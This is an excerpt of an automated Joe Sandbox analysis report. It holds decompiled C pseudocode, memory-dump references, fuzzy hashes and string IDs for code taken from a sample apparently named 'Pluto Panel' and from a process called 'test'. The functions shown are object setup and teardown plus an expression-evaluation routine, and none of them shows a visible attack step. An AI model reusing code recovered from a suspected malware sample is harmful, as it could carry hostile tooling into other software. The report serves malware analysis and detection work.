                                                                                                          • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                                          • Instruction Fuzzy Hash: B7517AB190024D9FDF24EF64DD459DD3BB8FF04308F10802AF928A6152D3B999A9DF89
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00F72E88(intOrPtr* __edi, void* __eflags) {
                                                                                                          				void* __esi;
                                                                                                          				intOrPtr* _t49;
                                                                                                          				intOrPtr* _t50;
                                                                                                          				intOrPtr* _t51;
                                                                                                          				intOrPtr* _t53;
                                                                                                          				intOrPtr* _t54;
                                                                                                          				intOrPtr* _t59;
                                                                                                          
                                                                                                          				_t60 = __edi;
                                                                                                          				E00F77340(__edi, __eflags);
                                                                                                          				 *((intOrPtr*)(__edi + 0x1d8)) = 0;
                                                                                                          				 *((intOrPtr*)(__edi + 0x1cc)) = 0;
                                                                                                          				 *((intOrPtr*)(__edi + 0x1d0)) = 0;
                                                                                                          				 *((intOrPtr*)(__edi + 0x1d4)) = 0;
                                                                                                          				_t5 = _t60 + 0x1e0; // 0x1e0
                                                                                                          				_t49 = _t5;
                                                                                                          				 *((intOrPtr*)(__edi + 0x1dc)) = 0x100;
                                                                                                          				 *_t49 = 0x413754;
                                                                                                          				 *((intOrPtr*)(_t49 + 0x10)) = 0;
                                                                                                          				 *((intOrPtr*)(_t49 + 4)) = 0;
                                                                                                          				 *((intOrPtr*)(_t49 + 8)) = 0;
                                                                                                          				 *((intOrPtr*)(_t49 + 0x14)) = 0x100;
                                                                                                          				 *((intOrPtr*)(_t49 + 0xc)) = 0;
                                                                                                          				 *_t49 = 0x413760;
                                                                                                          				 *((intOrPtr*)(__edi + 0x1c8)) = 0x413758;
                                                                                                          				_t13 = _t60 + 0x1f8; // 0x1f8
                                                                                                          				_t50 = _t13;
                                                                                                          				 *((intOrPtr*)(_t50 + 4)) = 0;
                                                                                                          				 *((intOrPtr*)(_t50 + 8)) = 0;
                                                                                                          				 *((intOrPtr*)(_t50 + 0xc)) = 0;
                                                                                                          				 *((intOrPtr*)(_t50 + 0x10)) = 0;
                                                                                                          				 *((intOrPtr*)(_t50 + 0x14)) = 0;
                                                                                                          				 *((intOrPtr*)(_t50 + 0x18)) = 0;
                                                                                                          				 *((intOrPtr*)(_t50 + 0x1c)) = 0;
                                                                                                          				 *_t50 = 0;
                                                                                                          				_t21 = _t60 + 0x630; // 0x630
                                                                                                          				_t51 = _t21;
                                                                                                          				 *((intOrPtr*)(_t51 + 8)) = 0x20;
                                                                                                          				 *_t51 = 0;
                                                                                                          				 *((intOrPtr*)(_t51 + 0xc)) = 0;
                                                                                                          				 *((intOrPtr*)(_t51 + 4)) = 0;
                                                                                                          				 *((char*)(__edi + 0x52a)) = 0;
                                                                                                          				_t26 = _t60 + 0x64c; // 0x64c
                                                                                                          				 *((intOrPtr*)(__edi + 0x640)) = 0x412e80;
                                                                                                          				E00F73549(_t26);
                                                                                                          				 *((intOrPtr*)(__edi + 0x858)) = 0x413144;
                                                                                                          				 *((intOrPtr*)(__edi + 0x86c)) = 0x4130f0;
                                                                                                          				_t30 = _t60 + 0x870; // 0x870
                                                                                                          				_t53 = _t30;
                                                                                                          				 *_t53 = 0x4130f0;
                                                                                                          				_t31 = _t60 + 0x878; // 0x878
                                                                                                          				_t59 = _t31;
                                                                                                          				 *_t59 = 0x413144;
                                                                                                          				 *_t53 = 0x412f34;
                                                                                                          				_t32 = _t60 + 0x87c; // 0x87c
                                                                                                          				_t54 = _t32;
                                                                                                          				 *__edi = 0x412e98;
                                                                                                          				 *((intOrPtr*)(__edi + 0x1c8)) = 0x412f1c;
                                                                                                          				 *((intOrPtr*)(__edi + 0x1e0)) = 0x413760;
                                                                                                          				 *((intOrPtr*)(__edi + 0x640)) = 0x412f24;
                                                                                                          				 *((intOrPtr*)(__edi + 0x858)) = 0x412f2c;
                                                                                                          				 *((intOrPtr*)(__edi + 0x86c)) = 0x412f30;
                                                                                                          				 *_t59 = 0x412f38;
                                                                                                          				_t38 = _t60 + 0x890; // 0x890
                                                                                                          				 *_t54 = 0x413bd8;
                                                                                                          				 *((intOrPtr*)(_t54 + 8)) = 0;
                                                                                                          				 *((intOrPtr*)(_t54 + 0x10)) = 0;
                                                                                                          				 *((intOrPtr*)(_t54 + 4)) = 0;
                                                                                                          				 *((intOrPtr*)(_t54 + 0xc)) = 0;
                                                                                                          				E00F73549(_t38);
                                                                                                          				 *((char*)(__edi + 0xb20)) = 0;
                                                                                                          				 *((char*)(__edi + 0xc25)) = 0;
                                                                                                          				 *((char*)(__edi + 0xd2a)) = 0;
                                                                                                          				 *((char*)(__edi + 0xe2f)) = 0;
                                                                                                          				 *((char*)(__edi + 0xa9c)) = 0;
                                                                                                          				return __edi;
                                                                                                          			}

                                                                                                          0x00f72e88
                                                                                                          0x00f72e8c
                                                                                                          0x00f72e93
                                                                                                          0x00f72e99
                                                                                                          0x00f72e9f
                                                                                                          0x00f72ea5
                                                                                                          0x00f72eab
                                                                                                          0x00f72eab
                                                                                                          0x00f72eb6
                                                                                                          0x00f72ebc
                                                                                                          0x00f72ec2
                                                                                                          0x00f72ec5
                                                                                                          0x00f72ec8
                                                                                                          0x00f72ecb
                                                                                                          0x00f72ece
                                                                                                          0x00f72ed1
                                                                                                          0x00f72ed7
                                                                                                          0x00f72ee1
                                                                                                          0x00f72ee1
                                                                                                          0x00f72ee7
                                                                                                          0x00f72eea
                                                                                                          0x00f72eed
                                                                                                          0x00f72ef0
                                                                                                          0x00f72ef3
                                                                                                          0x00f72ef6
                                                                                                          0x00f72ef9
                                                                                                          0x00f72efc
                                                                                                          0x00f72efe
                                                                                                          0x00f72efe
                                                                                                          0x00f72f04
                                                                                                          0x00f72f0b

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $/A$,/A$0/A$X7A$`7A
                                                                                                          • API String ID: 0-851144607
                                                                                                          • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                                          • Instruction ID: 441e2fda261442229fcda347b3d52f41cb1bd8f8564d279534b8ff214ad84a0f
                                                                                                          • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                                          • Instruction Fuzzy Hash: F24183B0655742EFC3498F2AC5846C1FBE0BB09314F96C2AFC46C9B211C7B4A565CF99
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00F73021(intOrPtr* __esi) {
                                                                                                          				void* __edi;
                                                                                                          				intOrPtr* _t20;
                                                                                                          				void* _t24;
                                                                                                          
                                                                                                          				_t20 = __esi + 0x878;
                                                                                                          				 *__esi = 0x412e98;
                                                                                                          				 *((intOrPtr*)(__esi + 0x1c8)) = 0x412f1c;
                                                                                                          				 *((intOrPtr*)(__esi + 0x1e0)) = 0x413760;
                                                                                                          				 *((intOrPtr*)(__esi + 0x640)) = 0x412f24;
                                                                                                          				 *((intOrPtr*)(__esi + 0x858)) = 0x412f2c;
                                                                                                          				 *((intOrPtr*)(__esi + 0x86c)) = 0x412f30;
                                                                                                          				 *((intOrPtr*)(__esi + 0x870)) = 0x412f34;
                                                                                                          				 *_t20 = 0x412f38;
                                                                                                          				E00F73663(__esi + 0x890);
                                                                                                          				 *((intOrPtr*)(__esi + 0x87c)) = 0x413bd8;
                                                                                                          				E00F7D71D(__esi + 0x87c);
                                                                                                          				 *_t20 = 0x413144;
                                                                                                          				 *((intOrPtr*)(__esi + 0x870)) = 0x4130f0;
                                                                                                          				E00F73663(__esi + 0x64c);
                                                                                                          				E00F72FE4(__esi + 0x1c8, _t24);
                                                                                                          				return E00F7744A(__esi);
                                                                                                          			}

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $/A$,/A$0/A$4/A$`7A
                                                                                                          • API String ID: 0-2435369464
                                                                                                          • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                                          • Instruction ID: b702a05e3d18b24217cde6c81ee1b33bcab95f560262bb4fbf2bb2f4250d9775
                                                                                                          • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                                          • Instruction Fuzzy Hash: 6001FFB4000745CAC721EF20C5406C6BBF4FB40305F50C50FE0AD47204DBB9A19AEF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 88%
                                                                                                          			E00F39829(intOrPtr _a4, signed char* _a8, intOrPtr _a12, char _a16, signed int* _a20) {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				signed int _v20;
                                                                                                          				void* __edi;
                                                                                                          				void* __esi;
                                                                                                          				signed int _t66;
                                                                                                          				void* _t70;
                                                                                                          				intOrPtr _t71;
                                                                                                          				signed int _t74;
                                                                                                          				signed int _t84;
                                                                                                          				void* _t85;
                                                                                                          				signed int _t94;
                                                                                                          				signed int* _t95;
                                                                                                          				signed int _t96;
                                                                                                          				signed int* _t97;
                                                                                                          				signed char* _t100;
                                                                                                          				signed int _t101;
                                                                                                          				signed char _t104;
                                                                                                          				signed char* _t136;
                                                                                                          				intOrPtr _t140;
                                                                                                          
                                                                                                          				_t136 = _a8;
                                                                                                          				_v20 = 0;
                                                                                                          				_v8 = 0;
                                                                                                          				_v12 = 1;
                                                                                                          				_v16 = 0x4435dc;
                                                                                                          				if(_t136 != 0) {
                                                                                                          					_t101 =  *_t136 & 0x000000ff;
                                                                                                          					if(_t101 == 0x84) {
                                                                                                          						_t101 = _t136[0x23] & 0x000000ff;
                                                                                                          					}
                                                                                                          					if(_t101 != 0x9c) {
                                                                                                          						L8:
                                                                                                          						if(_t101 == 0x5e || _t101 == 0x82 || _t101 == 0x81) {
                                                                                                          							_t140 = _a4;
                                                                                                          							_t66 = E00F3980E(_t140);
                                                                                                          							_v8 = _t66;
                                                                                                          							if(_t66 == 0) {
                                                                                                          								goto L22;
                                                                                                          							}
                                                                                                          							if((_t136[2] & 0x00000400) == 0) {
                                                                                                          								_push(_t136[4]);
                                                                                                          								_t71 = E00F2CE3A(0x44a3c8, _v16);
                                                                                                          								_v20 = _t71;
                                                                                                          								if(_t71 != 0) {
                                                                                                          									_t129 = _v8;
                                                                                                          									if(_v8 != 0) {
                                                                                                          										E00F393C1(0x41315e, _t129, _t71, 1);
                                                                                                          									}
                                                                                                          									if(_t101 == 0x82) {
                                                                                                          										 *((char*)(_v8 + 0x1e)) = 2;
                                                                                                          									}
                                                                                                          									L27:
                                                                                                          									if(_t101 == 0x81 || _t101 == 0x82) {
                                                                                                          										if(_a16 != 0x62) {
                                                                                                          											goto L31;
                                                                                                          										}
                                                                                                          										_push(0x63);
                                                                                                          										goto L32;
                                                                                                          									} else {
                                                                                                          										L31:
                                                                                                          										_push(_a16);
                                                                                                          										L32:
                                                                                                          										E00F3BE00(_v8);
                                                                                                          										_t74 = _v8;
                                                                                                          										if(( *(_t74 + 0x1c) & 0x0000000c) != 0) {
                                                                                                          											 *(_t74 + 0x1c) =  *(_t74 + 0x1c) & 0x0000fffd;
                                                                                                          										}
                                                                                                          										goto L34;
                                                                                                          									}
                                                                                                          								}
                                                                                                          								goto L22;
                                                                                                          							}
                                                                                                          							E00F39280(_v8, _t136[4] * _v12, _t136[4] * _v12 >> 0x20);
                                                                                                          							goto L27;
                                                                                                          						} else {
                                                                                                          							if(_t101 != 0x9c) {
                                                                                                          								if(_t101 != 0x83) {
                                                                                                          									L36:
                                                                                                          									 *_a20 = _v8;
                                                                                                          									goto L37;
                                                                                                          								}
                                                                                                          								_t140 = _a4;
                                                                                                          								_t84 = E00F3980E(_t140);
                                                                                                          								_v8 = _t84;
                                                                                                          								if(_t84 == 0) {
                                                                                                          									L22:
                                                                                                          									 *((char*)(_t140 + 0x1e)) = 1;
                                                                                                          									E00F2C16B(_t140, _v20);
                                                                                                          									E00F39A4C(_v8);
                                                                                                          									 *_a20 =  *_a20 & 0x00000000;
                                                                                                          									_t70 = 7;
                                                                                                          									return _t70;
                                                                                                          								}
                                                                                                          								_t85 = E00F2D157(_t136[4] + 2);
                                                                                                          								asm("cdq");
                                                                                                          								E00F393C1(0x41315e, _v8, E00F2D801(_t140, 0x9c, _t136[4] + 2, _t85 - 1), 0);
                                                                                                          								L17:
                                                                                                          								L34:
                                                                                                          								_t108 = _v8;
                                                                                                          								if(_v8 != 0) {
                                                                                                          									E00F3BCAB(_t108);
                                                                                                          								}
                                                                                                          								goto L36;
                                                                                                          							}
                                                                                                          							L12:
                                                                                                          							if(E00F39829(_a4, _t136[8], _a12, _a16,  &_v8) != 0) {
                                                                                                          								goto L34;
                                                                                                          							}
                                                                                                          							E00F391BB(_v8);
                                                                                                          							_t94 = _v8;
                                                                                                          							_t95 = _t94 + 0x10;
                                                                                                          							asm("adc edx, 0x0");
                                                                                                          							 *_t95 =  ~( *_t95);
                                                                                                          							_t95[1] =  ~( *(_t94 + 0x14));
                                                                                                          							_t96 = _v8;
                                                                                                          							_t97 = _t96 + 8;
                                                                                                          							asm("adc edx, 0x0");
                                                                                                          							 *_t97 =  ~( *_t97);
                                                                                                          							_t97[1] =  ~( *(_t96 + 0xc));
                                                                                                          							E00F3BE00(_v8, _a16);
                                                                                                          							goto L17;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_t100 = _t136[8];
                                                                                                          					_t104 =  *_t100;
                                                                                                          					if(_t104 == 0x81 || _t104 == 0x82) {
                                                                                                          						_v12 = _v12 | 0xffffffff;
                                                                                                          						_t136 = _t100;
                                                                                                          						_t101 =  *_t136 & 0x000000ff;
                                                                                                          						_v16 = 0x44a3c4;
                                                                                                          						goto L8;
                                                                                                          					} else {
                                                                                                          						goto L12;
                                                                                                          					}
                                                                                                          				} else {
                                                                                                          					 *_a20 = 0;
                                                                                                          					L37:
                                                                                                          					return 0;
                                                                                                          				}
                                                                                                          			}

                                                                                                          0x00f39834 0x00f39839 0x00f3983c 0x00f3983f 0x00f39846 0x00f3984d 0x00f39859 0x00f39862
                                                                                                          0x00f39864 0x00f39864 0x00f3986f 0x00f39890 0x00f39893 0x00f3996d 0x00f39970 0x00f39977
                                                                                                          0x00f3997a 0x00000000 0x00000000 0x00f39982 0x00f39998 0x00f399a3 0x00f399ad 0x00f399b0
                                                                                                          0x00f399d4 0x00f399d9 0x00f399e6 0x00f399ec 0x00f399f3 0x00f399f8 0x00f399f8 0x00f399fc
                                                                                                          0x00f39a02 0x00f39a10 0x00000000 0x00000000 0x00f39a12 0x00000000 0x00f39a16 0x00f39a16
                                                                                                          0x00f39a16 0x00f39a19 0x00f39a1c 0x00f39a21 0x00f39a29 0x00f39a2b 0x00f39a2b 0x00000000
                                                                                                          0x00f39a29 0x00f39a02 0x00000000 0x00f399b0 0x00f3998f 0x00000000 0x00f398b1 0x00f398b3
                                                                                                          0x00f3991e 0x00f39a3d 0x00f39a43 0x00000000 0x00f39a43 0x00f39924 0x00f39927 0x00f3992e
                                                                                                          0x00f39931 0x00f399b2 0x00f399b5 0x00f399ba 0x00f399c4 0x00f399cc 0x00f399d1 0x00000000
                                                                                                          0x00f399d1 0x00f3993a 0x00f39944 0x00f39961 0x00f39967 0x00f39a31 0x00f39a31 0x00f39a36
                                                                                                          0x00f39a38 0x00f39a38 0x00000000 0x00f39a36 0x00f398b5 0x00f398cf 0x00000000 0x00000000
                                                                                                          0x00f398d8 0x00f398dd 0x00f398e3 0x00f398ed 0x00f398f0 0x00f398f4 0x00f398f7 0x00f398fd
                                                                                                          0x00f39904 0x00f39909 0x00f3990b 0x00f39911 0x00000000 0x00f39911 0x00f39893 0x00f39871
                                                                                                          0x00f39874 0x00f39879 0x00f39880 0x00f39884 0x00f39886 0x00f39889 0x00000000 0x00000000
                                                                                                          0x00000000 0x00000000 0x00f3984f 0x00f39852 0x00f39a45 0x00000000 0x00f39a45

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ^$^1A$^1A$b
                                                                                                          • API String ID: 0-1727528133
                                                                                                          • Opcode ID: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                                          • Instruction ID: e86dbdba6889de86e2e86cbb71def602b0c0b0d55fad575dd0acedc568363d1e
                                                                                                          • Opcode Fuzzy Hash: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                                          • Instruction Fuzzy Hash: 2761AF31E08205AFDF14DF68C8817ADBBB1EF45330F248159E815AB292D7F99E50AB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (Mk$,$#ij^
                                                                                                          • API String ID: 0-33671148
                                                                                                          • Opcode ID: dd75d7e48007a0bdadfd37c17be5f687d4d05a4fe659911835fdd3f96376eb9d
                                                                                                          • Instruction ID: 4df1d3319fac2383a7bc99bd62ebe835da8cb15124f6b172851b2cb00fd53a93
                                                                                                          • Opcode Fuzzy Hash: dd75d7e48007a0bdadfd37c17be5f687d4d05a4fe659911835fdd3f96376eb9d
                                                                                                          • Instruction Fuzzy Hash: 7502AD30B012018FD714EF64D490B6AB7E2EFC5348F158568DA16AF7A5DF78AC49CB81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 467dea96bbafe13ee8bd71226724729c83867969206f536846d1bc929cedfde3
                                                                                                          • Instruction ID: 6d5d26c0bbf194483e4910ba4699f84243aec79b9562036c4cedcae5072f2e9d
                                                                                                          • Opcode Fuzzy Hash: 467dea96bbafe13ee8bd71226724729c83867969206f536846d1bc929cedfde3
                                                                                                          • Instruction Fuzzy Hash: 58518F30B101049FCB54DF68D498AAEBBF6AF89704F1581AAE506EF3A5CF75DC018B91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6e7f7bbc43f1d902a0df8ebd88ac6c0f6963a703db9637e0617ed43607434902
                                                                                                          • Instruction ID: bea1888b22be63f37e00baaf22f60e09584715f90a095e39dd6653298dfbf077
                                                                                                          • Opcode Fuzzy Hash: 6e7f7bbc43f1d902a0df8ebd88ac6c0f6963a703db9637e0617ed43607434902
                                                                                                          • Instruction Fuzzy Hash: 8941AD31B042058FCB149B68C4A8BAEBBF2AF89244F1484A9E105EF3A1DB74DC05CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: aa4ed3b3507cb69539b9ef0c97f7340e321c08c6549b07fe035c16ba9bdbd521
                                                                                                          • Instruction ID: e8b02568e0b1361a001b87248c88dd578c97d7aacef0dc6f1ca3b516e83760da
                                                                                                          • Opcode Fuzzy Hash: aa4ed3b3507cb69539b9ef0c97f7340e321c08c6549b07fe035c16ba9bdbd521
                                                                                                          • Instruction Fuzzy Hash: BE51C434612201CFC758FF28E4858997772FB85209B518979DD11AB26CEB3DAD4ACF82
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 39b43349636fd6d275ec18dae4dedb45d30154b1e836eb78001334d3efaece26
                                                                                                          • Instruction ID: 1e85288071ad00f8a0c1a763be4b6f05c4b48421b851684ae3260c4403d88335
                                                                                                          • Opcode Fuzzy Hash: 39b43349636fd6d275ec18dae4dedb45d30154b1e836eb78001334d3efaece26
                                                                                                          • Instruction Fuzzy Hash: 2631C071F04109AFCB14EBB884516AEBBF6EFC9244F1485BAC50AEB741DB349D428791
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cd7088c7d1853bd505445c12d0f49179f149e259655bd196c414b2efe5d0a98c
                                                                                                          • Instruction ID: 794dc0af0224cc17758a509da2f02e5e33ce24d1f7439578670ced7c3bbcafe3
                                                                                                          • Opcode Fuzzy Hash: cd7088c7d1853bd505445c12d0f49179f149e259655bd196c414b2efe5d0a98c
                                                                                                          • Instruction Fuzzy Hash: 5731BF71F042129FCB54DB788491AAEBBF6AFC9208B14407DE545DB3A0EF349C068791
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_2f00000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: ae56142edad82af97303cb3b906c3a41688193b8e7b7ebe164a65db62163e2b4
• Instruction ID: 349374b00a04c581e6adf78feb74d1a55494e8bc51cc44dacd368eac9f3adf24
• Instruction Fuzzy Hash: 64316930A002059FDB24DF69C498BAEBBF2FF89304F1485A9E501AB7A1CB75DC45CB91
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703457193.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_153d000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: 43ec388df2a85bb5351dd36c2200aca537e1439e9e2116d612965c56a7801dc4
• Instruction ID: 08420c99fb311e3efa36c684dd6bc6cf4230535bf9b6e19ebf850046103b5452
• Instruction Fuzzy Hash: FA2145B1504240DFCB05CF94D8C0B6ABBB1FBC8324F60C968E9094F206C376E856C7A2
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703457193.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_153d000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: 52a5370a534b719ed3429e6c75ffdaac8e0f9b811588b6162a8c8b97c9adf21c
• Instruction ID: 9f2547a781e30e1df7c30e586ac20156bb9ad21bcc7bfa482523a52ced1e05cf
• Instruction Fuzzy Hash: 7D2136B1504240DFDB05CF84D8C0B2ABFB5FBC8328F608568E9094F246C336D855C7A2
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_2f00000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: 9d5c148db99d610b5cb97c409df8bcdc1c81fe91c2f83adc1fb39a58e1a0a0b8
• Instruction ID: 416b8fe211a11659a26231e3cc1f553f8b8b2c03aff96127ce86e9c3d7674164
• Instruction Fuzzy Hash: B4217475B152119FDBB89FB0D99977E36A5AB84389B01003DA917D6284FF348808EF62
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_2f00000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: f248233016fe2358f1edb40ca2a5426ccfaffc9db89cc31d375ea24c0b51d473
• Instruction ID: 0a14125bf5a044f0cf543931ddf805da4f03091164a6346c39aca49ff393b19e
• Instruction Fuzzy Hash: 62218634B152218FDB68ABF0D59877E36A5AB84289B41043C9E16D62C4FF348408EF62
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703457193.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_153d000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: 17caa385876f5e1c7a045316c60cbc61f5624ac8f19059c857d985ea651f088b
• Instruction ID: 4d822349ed4f44cddb8294578f94bed27641a1b23a35f8b4ced36a7aec0a8fb5
• Instruction Fuzzy Hash: 6711B176804280CFDB12CF58D9C4B1ABF72FB84324F24C6A9D9054B657C33AD55ACBA2
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703457193.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_153d000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: 17caa385876f5e1c7a045316c60cbc61f5624ac8f19059c857d985ea651f088b
• Instruction ID: dfc7475af190e5b61b55e3e9a3bcad8dac6d732c057754ba30478fe4402aae18
• Instruction Fuzzy Hash: 9811B176404280CFCB12CF54D9C4B5ABF71FB84324F24C6A9D8454B616C37AE456CBA2
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_6_2_2f00000_test.jbxd
Similarity
• API ID / String ID / API String ID: (none)
• Opcode ID / Opcode Fuzzy Hash: 4cf6f9e6222a2abf9ef43ad61ac91c33f110056a7c09d34ff91e5136be5ec97b
• Instruction ID: f68b4d5343d9bc8dfdf93c47ad8253dddb1d7312500a63d3f9436247aaed7d63
• Instruction Fuzzy Hash: 0811E575B00244CFCB64EF78C455AAA7BF5EF8925970544B8C949EB361EB39CC0ACB81
